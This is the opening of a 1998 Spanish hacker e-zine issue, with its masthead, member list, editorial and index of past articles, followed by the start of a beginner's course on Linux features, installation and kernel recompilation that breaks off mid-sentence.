             
                        Ļ
                                          Ŀ  
                                          ۳  
                                   Ĵ  
                            Ĵ۳Ŀ    
                            ĿĴ۳    
                            Ŀ۳J    
                          Ŀ۳۳J۳        
                          ۳۳F        
                                     
                                              
                           H A C K E R S  T E A M     
                               J O U R N A L          
                        Ĺ        
                             VOL. #2, N6, 1998.     
                        ļ


             "The most important design issue...

                     is the fact that Linux is supposed to be fun..."

                                                  Linus Torvalds.   

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          

     Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso
           de la informacion aqui expuesta y tampoco tiene que estar
           de acuerdo con lo que sus colaboradores opinen.
           Tampoco esperamos que la gente use la informacion aqui expuesta
           para hacer dao ya que tan solo es con fines didacticos.
 
     Recomendado el uso del editor del MS-DOS.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          

     #CURRENT MEMBERS :

     - CONDE VAMPIRO     - CODER  H/P/V    EDITOR
     - MAC CRACK         - CODER  C        WEBMASTER
     - Mr ELEKTRO        -        H/P      ADMIN
     - SILENT MOTION     - CODER  H/P      ADMIN
     - JUMPKNOWN         - CODER  H/P/V/C
     - TASSLEHOFF        - CODER  H        CO-WEBMASTER

     #WEB OFICIAL :

     - http://www.angelfire.com/mi/JJFHackers
     - http://jjfhackers.home.ml.org
     - http://jjfhackers.hypermart.net

     #E-MAIL OFICIAL :

     - jjf_team@usa.net      

     #LLAVE PGP OFICIAL :
     
     -----BEGIN PGP PUBLIC KEY BLOCK-----
     Version: 2.6.3ia

     mQCNAzVzXWwAAAEEALKaPtG7arRh4X0wUz16KP9/A6h4yhS5vcQ1QRx9TM7XV8w6
     BcIJjz8AIeldDCO5Jix8R7Sb/FO/Uco0f5Rnpd98ObsHANr9wRDwGqUCWpOGVZ6+
     ZhXEyfuDkzVl9MUxEVD1TyH08OGgdgRIKhCuPXY4C7W6Z+M0qVv0AX/CgliNAAUR
     tCNKSkYgSGFja2VycyBUZWFtIDxqamZfdGVhbUB1c2EubmV0PokAlQMFEDVzXW1b
     9AF/woJYjQEBlVwEAKgIdS0VA7qRuXMM7R4DtDcoz7We+vmHr/Mu+SvgsDkWRbBP
     IHhI5OJxPRfShAvLtUXlGoCA0DuUDxoq4x9j/yDJQvhBwzPw53uwNWLs6+iI31jk
     NCyv9h37hSfRTsRLq8hiQ3jqNWQO/i+O+c5RVr5gkSHdZF0lCvWI5NoSFnk0
     =Wu00
     -----END PGP PUBLIC KEY BLOCK-----

     #DISTRIBUIDORES OFICIALES DEL E-ZINE :

     - http://wakanda.islatortuga.com
     - http://underhack.islatortuga.com
     - http://www.redestb.es/~cheroky-1 
     - http://members.xoom.com/baron_rojo/
     - http://members.xoom.com/rifoxxx
     - http://www.geocities.com/Colosseum/Sideline/9497/

     #MIEMBRO OFICIAL (web ring) DE :

     - Black Angels
     - Spanish Underground Web Ring

     #COLABORADORES CON ESTE NUMERO :

     - LeTaL
     - CORE SDI S.A.
     - \Wend|g0
     - ZeD (HaCk`S-wEb-RiNg)

     #SALUDOS :

     - Metalslug (Wakanda)           - NeonSurge (Rhino9)
     - Schoddy Guy (Underhack)       - L0pth
     - Cheroky                       - Ivan Arce (CORE SDI S.A.)
     - Silicon Dragon                - Proyecto R
     - Paseante (SET) 
     - Dr Slump (oioio)
 
<>
<>
<>

  - INDICE.                                  

    TITULO                                        AUTOR
  \_______________________________/

  * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  * INDICE DEL VOLUME N1 .................... J.J.F. / HACKERS TEAM 
  * CURSO LINUX .............................. LETAL.
  * HACK BASICO .............................. \WEND|G0.
  * CURSO DE HACK VI ......................... CONDE VAMPIRO.
  * CLONANDO MOVILES DEL CCC ................. J.J.F. / HACKERS TEAM
  * QUE SE PUEDE HACER EN EL IRC? ........... ZED.
  * PHREACKING PARA NOVATOS .................. ZED.
  * COMO TRUCAR EL GINDOWS95 ................ ZED.
  * ADVERTENCIA DE SEGURIDAD ................. CORE SDI S.A.
  * EL LECTOR OPINA .......................... VARIOS.
  * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM

<>

<>

  -------------
   EDITORIAL 
  -------------

        Pues quien lo diria, que este ezine comienza su segundo volumen y
  por supuesto nos anima a seguir mejorando no solo el ezine, si no tambien
  el web y muchas mas cosas que ya os iremos contando, que a lo largo de
  este ao seran muchas. Destacar que empezamos el segundo volumen con muy
  buena calidad. Una de las cosas a destacar es la bienvenida de nuevos
  miembros en J.J.F. / HACKERS TEAM, que son los siguientes : Mr. Elektro,
  Silent Motion, JumpKnown y Tasslehoff.

        Una pequea resea, ya que tenemos mas distribuidores oficiales, en el
  cual podreis encontrar este ezine y tambien otros, los url's son los
  siguientes: http://members.xoom.com/rifoxxx y
  http://www.geocities.com/Colosseum/Sideline/9497/

        Bueno, ya se acabo el verano, para algunos mal y para otros bien,
  como siempre ahi toda clase de opiniones. Desde aqui quiero hacer una
  pequea resea,  me pregunto donde esta toda esa gente que decia que
  quiere colaborar con articulos. ? Ya que todavia no hemos visto nada de
  nada, a ver si para futuros numeros vemos vuestros nicks por aqui :)
  Como ya hemos dicho muchas veces puedes escribir sobre H/C/P/V, seguridad
  o de cualquier cosa que creas interesante. Por supuesto tambien nos
  gustaria los puntos de vista de los administradores, agentes de la autoridad
  y de las grandes corporaciones. Este es un ezine para todos los gustos.
  Y POR FAVOR!!!!!!!! Si quieres escribir no envies un mail antes dicendo:
  "Hola, os interesa un articulo de ...", lo que tienes que hacer es
  ESCRIBIRLO y DESPUES NOS LO ENVIAS, asi de simple, okis!!!!

        Por una vez en la vida sabemos cuando saldra el numero 7 :), por
  eso avisamos de antemano para que envieis vuestros articulos. El numero 7
  esta fijado para principios de diciembre, por lo que teneis tiempo de
  sobra.  Porque a principios de diciembre ?, la respuesta en el numero 7 :)

        Hemos visto que en muchos sitios, tanto en web's como en articulos,
  la gente no nos nombra correctamente y eso ahi que corregirlo, por lo que
  hacemos hincapie en que para referiros al grupo lo hagais de la siguiente
  manera : J.J.F. / HACKERS TEAM, y para referiros al ezine, pues de esta
  otra: J.J.F. / HACKERS TEAM JOURNAL. Que son las formas correctas :)

        En este numero hemos sufrido un pequeo retraso debido a varios
  factores :) tambien decir que ayer fue el cumple de Conde Vampiro (21/9)
  y el jueves es el de Tasslehoff (24/9) por lo que este semana estamos
  de fiesta :))) Dentro de una semana, podreis encontrar en nuestro website
  varias fotos de nuestras aventuras nocturnas que seguro que os encantaran,
  por otro lado, AVISO A LOS DISTRUIBUIDORES OFICIALES: decir que hemos
  puesto 2 logos que cualquiera que distribuya nuestro ezine le rogamos
  que ponga en su website y ademas nos envie su url para ponerlo en el
  ezine.

        Desde aqui, - J.J.F. / HACKERS TEAM -, mandamos un apoyo a SET por los
  problemas sufridos, referente a unos logs de un determinado kanal de IRC
  de la red Hispanos y que sigan tirando para adelante :)

        Desde aqui damos las gracias al seor Ivan Arce, por dejanos
  publicar los avisos de la empresa CORE, al igual que tambien queremos
  anunciaros, para los que no lo sepan, la mejor lista de seguridad en
  castellano que se puede encontrar, la cual el seor Arce es el moderador y
  para suscribirse haced lo siguiente, enviar mail a majordomo@secnet.com
  con el texto "subscribe seg-l [su-email]" en el cuerpo del mensaje y ya
  estareis suscritos.

        Tambien damos las gracias a los seores Sergi Bueno y Javier Pedreira
  "Wicho" de las revistas EN LA RED e IWORLD, respectivamente, por dejarnos
  expresar nuestras opiniones y poder colaborar. Durante este ao hemos
  salido en las siguientes revistas :

  - EN LA RED, 2.03.

  - IWORLD, Ao II, Numero 7. Julio-Agosto 1998.

  - Jumping, Ao IV, 2 Epoca, N20, Julio-Agosto 1998.

  A todos ellos en gran o menor medida gracias.

                                                   - J.J.F. / HACKERS TEAM -

<>

<>

                    
                                                         
                            INDICE DEL VOLUME N1        
                                                         
                      - J.J.F. / HACKERS TEAM JOURNAL -  
                                                         
                    

        Pues aqui os recordamos los articulos que han pasado por el Primer
  Volumen del - J.J.F. / HACKERS TEAM JOURNAL -. A la vez que tambien damos
  las gracias a todas aquellas personas que han hecho posible este ezine.

  -> N1

    TITULO                                        AUTOR
  ------------________________________________---------------
  
  * EDITORIAL ________________________________ J.J.F. / HACKERS TEAM
  * TECNICAS HACKER __________________________ VANDALS.
  * CURSO DE HACK I __________________________ CONDE VAMPIRO.
  * STACK OVERFLOW EXPLOiTS __________________ IPgh0st.
  * CONFERENCIA DE LA GC EN EL SIMO __________ NOBODY.
  * TEST HACKER ______________________________ MAC CRACK BISHOP.
  * NOTICIAS UNDERGROUND _____________________ CONDE VAMPIRO.

  -> N2

    TITULO                                        AUTOR
  \_______________________________/

  * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  * IP-SPOOFING DEMISTIFICADO ................ IPgh0st.
  * LAND ATTACK .............................. NOBODY.
  * CURSO DE HACK II ......................... CONDE VAMPIRO.
  * MOVIL DEFECTUOSO ERICSSON GA-628 ......... JSR.
  * INTRODUCCION AL HACK ..................... VIRUX.
  * HACKERS HALL OF FAME ..................... BISHO.
  * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM

  -> N3

    TITULO                                        AUTOR
  \_______________________________/

  * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  * MIEDO A LOS ARTICULOS: NO, GRACIAS ....... CONDE VAMPIRO.
  * QUE ES UN HACKER Y QUE ES UN CRACKER ..... BISHO.
  * LOS OUTDIALS EN INTERNET ................. NOBODY.
  * UN LOG DE UN SERVIDOR .................... ANONIMO.
  * CURSO DE HACK III ........................ CONDE VAMPIRO.
  * USO DE SAMBA EN LINUX/UNIX COMO
    SUSTITUTO DEL NBTSTAT .................... ENIF.
  * ESTADISTICA DE LOS HACKERS EN 1997 ....... J.J.F. / HACKERS TEAM
  * DOCUMENTO SOBRE LOS PERMISOS DE ARCHIVOS
    Y DIRECTORIOS PARA SISTEMAS UNIX ......... KOJI.
  * INTRODUCCION AL HACKING v2.0 I ........... DAEMON.
  * EL LECTOR OPINA .......................... VARIOS.
  * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM

  -> N4

    TITULO                                        AUTOR
  \_______________________________/

  * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  * HACK WITH JAVA ........................... NOBODY.
  * UN POKILLO DE PHREAKING .................. DRSLUMP.    
  * CURSO DE HACK IV ......................... CONDE VAMPIRO.
  * COMO HACKEAR UN TAMATGOTCHI .............. BISHO.
  * MANIFIESTO DE UN HACKER NOVATO ........... SILICON DRAGON.  
  * INTRODUCCION AL HACKING v2.0 II .......... DAEMON.
  * EL LECTOR OPINA .......................... VARIOS.
  * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM

  -> N5

    TITULO                                        AUTOR
  \_______________________________/

  * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  * HACK RSH (RESTRICTED SHELL) .............. NOBODY.
  * HERRAMIENTAS PARA USUARIOS DE LINUX
    (PARANOICOS?) ............................ CUBIKICE.
  * CURSO DE HACK V .......................... CONDE VAMPIRO.
  * COMO CRACKEAR NORTON CRASHGUARD
    DELUXE 3.0 ............................... ESTADO PORCINO.
  * UN POCO DE CULTURA: LIBROS ............... MAC CRACK
  * EL LECTOR OPINA .......................... VARIOS.
  * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM

        Y ahora un saludo a las siguientes personas que de alguna forma han
  participado con - J.J.F. / HACKERS TEAM -.

  -> Saludos :

  - VANDALS  
  - IPgh0st  (Underhack)
  - NOBODY
  - Virux (@pOkalypSYS)
  - Bisho
  - Jsr
  - Metalslug (Wakanda)
  - Koji
  - Cesar
  - Enif (Oioio)
  - Daemon  
  - Schoddy Guy (Underhack)
  - DrSlump (OiOiO's Band)
  - Silicon Dragon
  - Cheroky
  - CubikIce
  - Estado Porcino (WKT)
  - Paseante (SET) 
  - Profesor Falken (SET)

<>

<>

                            ---------------
                           -< CURSO LINUX >-
                            ---------------

  INDICE TEMATICO
  ---------------

  #CAPITULO I: INTRODUCCION.
  Linux, la mejor alternativa, caracteristicas.

  #CAPITULO II : INSTALACION.
  Requerimientos para la instalacion, Preparacion, Instalacion.

  #CAPITULO III: KERNEL
  Que es el Kernel, Para que recompilarlo?, Que se necesita?,
  Configuracion, Makefile, Compilacion, Instalacion.

  #CAPITULO IV: USO
  Conceptos basicos preliminares, Shells, Directorios, comandos basicos.

  #CAPITULO V: TAREAS Y PROCESOS
  Control de Tareas, Tareas y procesos, Primer plano y Segundo plano,
  Envio a segundo plano y eliminacion procesos, Detencion o parada y
  relanzamiento de tareas.

  #CAPITULO VI: USUARIOS Administracion de Usuarios. Como agregar un usuario,
  Como borrar un usuario.

  #CAPITULO VII: SEGURIDAD BASICA
  Permisos de Ficheros, Conceptos de permisos de ficheros, Interpretando los
  permisos de ficheros, Dependencias, Cambiando permisos, Grupos,

  #GLOSARIO. 

        #Capitulo I

        Linux, la mejor alternativa.

        Vamos a hablar un poco acerca de Sistemas Operativos. Mucho Usuarios
  especialmente los novatos creen que el mundo esta hecho solo de Windows 95
  y que el DOS fue su antepasado antediluviano, en realidad Windows 95 es una
  nueva cara bonita del DOS. Pero la realidad nos dice que no existe un solo
  S.O. tenemos varias decenas de ellos, por ejemplo antes de DOS fue CPM del
  que heredamos entre otras cosas los archivos .COM, tambin existen SPARC,
  OS400, PICK, SYSTEM, OASIS, y una gran variedad de derivados de UNIX, entre
  ellos SOLARIS, AIX, XENIX, USB, SUN OS y LINUX.
        La aparicion de W95 a creado adeptos y adversos, pero tambien a dado
  origen a un debate acerca de los sistemas operativos que creo le hace
  mucho bien a la informatica.
        Para contribuir con este debate imaginemonos el Sistema Operativo
  ideal. Seguramente no todos estaremos de acuerdo en todas las sus
  caracteristicas pero busquemos por lo menos diez puntos en comun.

        1. CODIGO: Si nuestra PC actualmente tiene un microprocesador de 32
  bits, el Sistema deber  ser "completamente" de 32 bits. Es mas si en el
  futuro tenemos PCs con procesadores de 64 bits, tambien el S.O. deber
  estar compilado en 64 bits. Mas aun, seria mejor que el sistema operativo
  se provea con sus fuentes en el lenguaje mas portable de cuantos existen
  asi lo podemos compilar en la maquina que se nos antoje.

        2. RED: Actualmente se impone cada vez con mayor firmeza el uso de
  redes ya sean locales, Intranets e Internet. De manera que nuestro sistema
  operativo deber estar concebido como de red desde sus origenes. Existen
  muchos sistemas de red, debemos entonces pensar cual es la mejor opcion
  teniendo en cuanta varios factores, la popularidad, la trayectoria, la
  compatibilidad, la fiabilidad, etc. Tenemos que tener en cuenta tambien
  cual es la escala mundial el estandar en Internet. La respuesta es una
  sola, UNIX. Asi que nuestro S.O. deber estar basado en UNIX.

        3. INTEFRCACE CON EL USUARIO: Con la aparicion de las MAC, se impuso
  un nuevo estandar que luego fue incorporado por casi todos los S.O. Las
  Interfaces Graficas. De manera que nuestro S.O. tiene que tener una. Es mas
  seria mejor que tenga muchas y que el usuario pueda elegir si quiere que
  esta se vea y comporte como Win95, como Solaris, como las no tan populares
  NEXT, una propia de UNIX como ser MOTIFF, o de muchas otras formas algunas
  totalmente ineditas y originales.

        4. MULTITAREA: El cerebro del hombre es multitarea por naturaleza,
  asi que la principal extension artificial del mismo (la PC) deber tener un
  sistema operativo multitarea. Pero multitarea real, de tipo cooperativo,
  que garantice la posibilidad de ejecucion de todas las aplicaciones
  activas.

        5. MULTIUSUARIO: La PC no es como un cepillo de dientes de uso
  personal exclusivamente es mas bien como una esponja o cepillo de bao que
  los usan toda la familia de manera que nuestro S.O. ideal deber tener
  capacidad de administrar en forma segura la informacion y aplicaciones de
  cada uno de sus usuarios pudiendo estos tener terminales propias o bien
  usar una sola maquina.

        6. MULTIMEDIA: Nuestro S.O. tendra que soportar todas las
  capacidades multimedia actuales y las que vendran deberan tener una rapida
  asimilacion.

        7. APLICACIONES: Sin una fuerte biblioteca de aplicaciones un S.O.
  esta destinado a perecer. De manera que tendremos que contar con una
  amplisima coleccion de aplicaciones que cubran todos los rubros tales como
  Graficos, Animaciones, Musica, Autoedicion, Procesamiento de textos,
  Gestion administrativa y comercial. No nos olvidemos que como el S.O. de
  suministra con sus fuentes es logico que las aplicaciones tambien lo hagan.
  Como nos basamos en UNIX podremos aprovechar todo el software desarrollado
  para esa plataforma.

        8. OTRAS PLATAFORMAS: Las aplicaciones de otras plataformas tales
  como DOS, Windows o Mac, tienen que correr con emuladores.

        9. DESARROLLO: Es importante que nuestro S.O. tenga un amplio surtido
  de compiladores y librerias, tales como C, C++, PASCAL, BASIC, SMALLTALK,
  EIFFEL, CLIPPER, PERL, FORTRAM, ADA, MODULA 2, ETC.

        10. Y como si todo esto fuera poco pidamos que este soportado por un
  cuerpo de diseadores y programadores expertos de todo el mundo.

        11. Una de yapa. Que todo absolutamente todo sea GRATIS.

        Que tal? No parece un sueo llegar a contar algun dia con un S.O.
  como este. Pero este sueo no es mio, esta quimera le pertenece a un
  finlandes llamado Linus Torvalds y fue precisamente el quien dio los
  primero pasos para hacerlo realidad y asi nace LINUX un S.O. con
  mayusculas que no tiene nada que envidiarle a nadie. Actualmente en
  cualquier casa de venta de Shareware se los puede conseguir al precio que
  solo cubre los gastos de distribucion, por ejemplo tenemos paquetes que
  cuentan con Cuatro o Cinco Distribuciones distintas ademas una completa
  recopilacion de aplicaciones compiladores y librerias a menos de $30 en 6 o
  mas CDs. Tambien esta disponible en Internet en todas sus distribuciones.
  Son de recomendar las paginas WWW.LINUX.ORG, WWW.SUNSITE.UNC.EDU.

        Caracteristicas de Linux

        * Multitarea real: La multitarea es una virtud codiciada por muchos
  SS.OO. pero lograda por muy pocos, casi todos los SS.OO. que dicen ser
  multitarea lo son a medias ya que usan el concepto de Multitarea
  Cooperativa que cede el microprocesador a otros procesos (aplicaciones)
  solo cuando la aplicacion que se encuentra en primer plano cede el tiempo
  de ejecucion y recursos, en cambio la multitarea preferente que usa Linux
  administra los recursos garantizados que todos los procesos en ejecucion
  incluidos los que corren en background tengan su tiempo de procesador.

        * Multiusuario: Dado que como ya vimos Linux es un S.O. multitarea
  es de esperar que tambien sea Multiusuario, es decir que permita que
  personas distintas puedan acceder a su potencial compartiendo los recursos
  que el Administrador del Sistema (SysOp, root) le asigne de acuerdo a su
  jerarquia, dandole ademas a cada uno la privacidad y proteccion necesaria.
  Cada usuario tendra asignado un espacio de disco, aplicaciones, Shells,
  impresoras, etc. lo que junto a la ID (nombre con que el usuario se
  registra) y el password (palabra clave) se denomina Cuentas de Usuarios, en
  el momento en que un usuario desde una terminal remota entra en el sistema
  (login) se dice que comienza una sesion es decir que el micro le garantiza
  recursos y tiempo de microprocesador.

        * G.N.U.: Si bien Linus Torvalds es el titular del derecho de autor
  de LINUX, todo, incluido el kernel con sus fuentes estan bajo licencia GNU.
  Esta licencia permite que todos el software desarrollado bajo este concepto
  sea de libre distribucion ofreciendo asi al publico en general software de
  calidad sin que los programadores pierdan sus derechos de autor dejando
  abierta la posibilidad que cualquier otro programador pueda ampliar o
  modificar el programa.

        * Librerias Compartidas: Gracias a esta caracteristicas no es
  necesario que las rutinas contenidas en librerias estandar se carguen mas
  de una ves en memoria, ya que cualquier programa que se encuentre en tiempo
  de ejecucion puede acceder a ellas, de esta manera los binarios
  (ejecutables) de Linux son de menor tamao permitiendo ahorrar espacio en
  disco y memoria.

        * Carga por Demanda:  En la mayoria de los SS.OO. Cada nuevo proceso
  (aplicacin) que se lanza demanda memoria y recursos, pero cuando se
  termina la RAM automaticamente se comienza a hacer uso de la memoria
  virtual, esto no ocurre en Linux puesto que su administracion inteligente
  de memoria pasa a memoria virtual cualquier proceso que se encuentre activo
  pero no en uso garantizando de esta manera RAM para la aplicaciones activas
  y en uso.

        * Administracion de Memoria: Todos los procesos tienen garantizada
  una zona protegida de memoria para su ejecucion, sin que el mal
  funcionamiento de una aplicacion cuelgue a todo el equipo.

        * Redes TCP/IP: Para conectarse a Internet por ejemplo en Windows
  necesitamos instalar el protocolo TCP/IP. Esto no ocurre en Linux ya que al
  ser TCP un protocolo propio de los sistemas UNIX luego heredado por Linux
  contamos directamente con el en el kernel, incluso la aparicin de Java no
  paso inadvertida para Linux de manera que fue inmediatamente absorbida y ya
  se cuenta con soporte tanto para JavaScripts como para applets Java los
  cuales se pueden ejecutar como software nativo al estar incluido en el
  Kernel.

        * Aplicaciones: Gracias a la licencia GNU el caudal de aplicaciones
  disponibles para Linux crece a un ritmo vertiginoso especialmente en
  Internet. Podemos decir que existe software para practicamente todas las
  necesidades. La unica limitacion para los usuarios de habla hispana es el
  idioma ya que es muy dificil encontrar software traducido o de origen
  latino para Linux.

        * Desarrollo: Linux es un S.O. echo y pensado por programadores para
  programadores, a partir de esto podemos encontrar compiladores o
  interpretes para todos los lenguajes existentes. Algunos ejemplos son los
  siguientes: C (propio de los sistemas UNIX), C++, ADA, PASCAL, PERL,
  MODULA 2, FORTRAN, PHYTON, EIFFEL, BASIC, RPG, SMALLTALK, COBOL, ASSEMBLER,
  OBERON, ETC.

        #Capitulo II

        Requerimientos de hardware para la instalacion

        * CPU: Su computadora debe tener un procesador 386, 486, Pentium, o
  Pentium Pro, o uno de los clones de estos procesadores hechos por
  fabricantes como Cyrix, AMD, TI, IBM, etc. Si su procesador tiene letras
  como "sx", "sl", "slc", etc. despues del numero, como en "386sx", es
  correcto. El sistema no funcionar  en un 286 o en procesadores inferiores.

        * Bus de E/S: Su computadora debe utilizar el bus ISA, EISA, PCI, o
  VL. El bus VL se conoce tambien como VESA Local Bus o VLB. Las computadoras
  que tienen PCI o VLB generalmente tienen tambien ranuras ISA o EISA.

        * RAM y Disco Rigido: Debe tener al menos 4MB de RAM aunque es
  recomendable no menos de 16MB y 40MB de disco duro, pero si usted quiere
  instalarlo todo necesitar  300MB o mas. Las interfaces de disco que emulan
  la interfaz de disco "AT" que se llaman habitualmente MFM, RLL, IDE, o ATA
  estan soportados. Las controladoras de disco SCSI de diversos fabricantes
  estan soportadas.

        * Unidad de disquete: Debe tener una unidad de disquete de 1.2MB o
  1.44MB como unidad a: en el sistema en el que instale Linux. Si tiene tanto
  una unidad de 1.2MB como una de 1.44MB, configure el hardware para que la
  unidad de 1.44MB sea la a:.

        * MPC: Como casi todas las distribuciones de Linux vienen en CD-ROM
  necesitaremos una lectora que puede ser IDE, SCSI o con norma propia como
  alguna Creative o Mitusmi.

        * Placa de video: Aunque soporta desde una hercules, es recomendable
  usar una placa de video compatible con VGA para el terminal de la consola.
  Practicamente cualquier tarjeta grafica moderna es compatible con VGA. CGA,
  MDA, o HGA pueden funcionar correctamente para texto, pero no funcionar 
  con el Xwindows.

        * Otro Hardware: Linux soporta una gran variedad de dispositivos como
  son: ratones, impresoras, escaners, modems, tarjetas de red, etc. Sin
  embargo, no se requiere ninguno de estos dispositivos durante la
  instalacion del sistema.

        Preparacion:

        Antes de comenzar, asegurese de que realiza una copia de seguridad de
  todos los ficheros que hay en su sistema. 

        Informacion que necesitar :

  * Norma del CD-ROM

  * Norma del HD

  * Especificaciones de su placa de RED (Modelo, Puerto E/S, IRQ)

  * Especificaciones de su raton, modem, teclado, zona horaria.

  * Frecuencia de barrido horizontal y vertical de su monitor, marca, modelo,
    chipset, RAM y clocks de su placa de video.

  * Tipo de servidor grafico segun su placa de video.

  * El nombre de la maquina (posiblemente pueda decidir esto por su cuenta).

  * El nombre del dominio.

  * La direccion IP de su computadora.

  * La mascara de red (netmask) que ha de usarse con su red.

  * La direccion IP de su red.

  * La direccion de difusion (broadcast) que ha de usar en su red.

  * La direccion IP de la pasarela (gateway) del sistema por omision hacia la
    cual hay que encaminarse, si su red tiene una pasarela.

  * El sistema de su red que debe usar como servidor DNS (`Domain Name
    Server', servidor de nombres de dominio).

        Antes de proceder a la instalacion en si, debemos realizar una serie
  de preparativos en nuestro equipo

        Preparacion del HD. Si no ha particionado aun su rigido para Linux y
  memoria virtual deber recurrir a la aplicacion shareware FIPS que
  encontrara en cualquier distribucion de Linux, pero antes de usarla
  asegurese de que desfragmento su HD. FIPS le permitir ahora particionar su
  rigido sin que pierda la informacion contenida. Dejaremos de esta manera
  suficientes megas libres de su HD para luego cuando la instalacion lo
  requiera creemos las nuevas particiones con "fdisk", al menos una particion
  Nativa Linux y una particion de intercambio para Linux, la particion de
  intercambio se utilizar para suministrar memoria virtual al sistema, y debe
  tener un tamao entre 16 y 128 megabytes, dependiendo de cuanto espacio de
  disco tenga usted y cuantos programas grandes quiera ejecutar. Linux no
  usar mas de 128 megabytes de intercambio, asi que no hay razon para hacer
  su particion de intercambio mayor que eso. Se recomienda el uso de una
  particion de intercambio sea cual fuere su RAM, y si su sistema tiene mas
  de 16 megabytes de RAM lo recomendable para un uso promedio del sistema es
  usar la mitad de RAM real como memoria de intercambio. La particion "Linux"
  contendra todos sus ficheros, y puede hacerla de cualquier tamao entre 40
  megabytes y el tamao maximo del disco, menos el tamao de la particion de
  intercambio. Si usted esta familiarizado con Unix o Linux, puede querer
  crear particiones adicionales, por ejemplo, puede crear particiones que
  contendran los sistemas de ficheros /var, y /usr.

        Si ya tenemos listo el Disco Rigido y la informacion necesaria
  podemos proceder a la instalacion para ello necesitaremos que la PC
  encendida con DOS y con acceso al CD-ROM con el CD de Red Hat colocado.

  1. Ingresar al directorio DOSUTILS

  2. Ejecutar DOSBOOT.BAT el que se encarga de llamar a "LOADLIN.EXE" que es
     un programa DOS que carga una imagen del Kernel en RAM borrando todo
     vestigio del DOS.

  3. Luego del Booteo, Linux entra automaticamente en una aplicacion que no
     es otra cosa que un asistente para la instalacion. A el deberemos
     contestar las preguntas que nos vaya haciendo de acuerdo a la
     informacion que recopilamos.

  4. Tambien el asistente se encargara de preguntar acerca del nuestro HD
     dandonos la posibilidad de ejecutar "fdisk" a fin de particionar nuestro
     rigido, el uso de fdisk es sencillo a pesar de ser mucho mas poderoso
     que el de DOS y Windows basta decir que con "m" accedemos a la ayuda del
     mismo, lo que hora debemos hacer es: a) crear la particion SWAP con por
     lo menos la mitad de la RAM real, para ello usaremos la opcion "n" y
     luego de decirle el numero de particion le indicaremos el tipo que deber
     ser primaria, con "t" le cambiamos el tipo a "82" que es SWAP, b) crear
     la particion Linux Nativa con "n" nuevamente que tambien deber ser
     primaria el tipo no es necesario cambiarlo por cuanto por defecto crea
     particiones Linux Nativa (tipo 83).

  5. Seleccionar los paquetes que instalaremos, esta es una lista muy
     extensa, son imprescindibles los paquetes base, C, C++, X11, Network,
     pero son necesarios casi todos si lo que pretendemos es un servidor de
     RED, lo superfluo son lo juegos y algunas aplicaciones muy especificas
     como el diseo de circuitos y microprocesadores. Es recomendable
     instalar el Midnight Commander que es un clon de Norton Comander para
     Linux el que se encuentra en el paquete de Shells y el "joe" que es un
     editor de texto similar a WordStar y los IDE de Borland.

  6. Ahora el asistente nos ayudara a instalar "lilo" que es el sistema de
     arranque dual de Linus el que nos permitir la posibilidad de arrancar
     con mas de un S.O.

  7. Si todo salio bien ya hemos terminado con la instalacion Red Hat. Si no
     es asi aqui comienza nuestro penar y lo que les puedo recomendar es
     armarse de paciencia y resarle a nuestro santo favorito que encontremos
     las solucion.

        #Capitulo III

        KERNEL

        Que es el Kernel?

        El kernel de UNIX actua como intermediario entre los programas, el
  ordenador y el usuario. En primer lugar, gestiona la memoria de todos los
  programas o procesos, y asegura que se asignen ciclos del microprocesador a
  cada uno. Ademas, proporciona una interfaz portable para que los programas
  hablen facilmente con su hardware.

        Para que recompilar el kernel?

        Las nuevas versiones normalmente ofrecen la posibilidad de entenderse
  con mas accesorios hardware (o sea, incluyen mas drivers), se ejecutan mas
  rapidamente, son mas estables o corrigen errores de otras versiones. Ademas
  la recompilacion nos permitir adecuar el nucleo a el hardware que tenemos
  pudiendo de esta manera acceder por ejemplo a placas de sonido, video, etc.
  Otra de las ventajas es que podemos seleccionar que sistemas de archivos
  vamos a necesitar por ejemplo en mi caso unicamente accedo a sistemas Vfat
  de W95, MS-DOS, ISO9660, Minix  y Ext2fs, de manera que no ocupo
  innecesariamente recursos al incluir sistemas de archivos por ejemplo para
  OS/2 o Coherent.

        Que necesito para recompilar el Kernel?

  Necesitaremos: 

  1. Las fuentes del Kernel que se proveen con cualquier distribucion de
     Linux, tambien los podemos actualizar de Internet para poder contar con
     la ultima version. Aproximadamente los fuentes comprimidos con gzip
     ocupan 8MB y una vez descomprimido en el disco usan cerca de 30MB.

  2. El compilador de C "gcc" incluido en el paquete de "Development"

  3. Las librerias "libc".

  Archivos y directorios.

        Entre en la cuenta root y vaya al directorio /usr/src. Si instalo las
  fuentes en la instalacion de Linux, habra aqui un directorio linux, con las
  fuentes antiguas. Si quiere preservar esas fuentes (y tiene espacio de
  sobra), renombre (con mv) ese directorio a linux-x.y.z. Es importante que
  antes de descomprimir las nuevas fuentes no haya ningun directorio
  /usr/src/linux.

        Ahora, en /usr/src, descomprima las fuentes con

  tar xvfzp linux-x.y.z.tar.gz

        (Si solo tiene un fichero .tar, sin .gz, elimine la z del comando
  tar). Los contenidos del fichero se expandir n en /usr/src/linux. Vaya
  ahora a ese directorio y lea el fichero README.

        Configuracion del Kernel

        Antes de recompilar debemos configurar que caracteristicas tendra
  nuestro nuevo kernel para ello primero limpiaremos de anteriores
  configuraciones el disco con:

  make mrproper

        luego comenzaremos con la configuracion en si con:

  make config

        invocado en el directorio /usr/src/linux inicia un programa shell-
  script de configuracion que le preguntar bastantes cosas. Requiere que este
  instalado bash, con lo que debe existir /bin/bash, /bin/sh o la variable
  $BASH.

        Si los fuentes que posee son superiores al 2.0.x, existen dos metodos
  bastante mas agradables e interactivos de llevar a cabo la configuracion;
  invocando desde modo texto, en el mismo directorio mencionado anteriormente

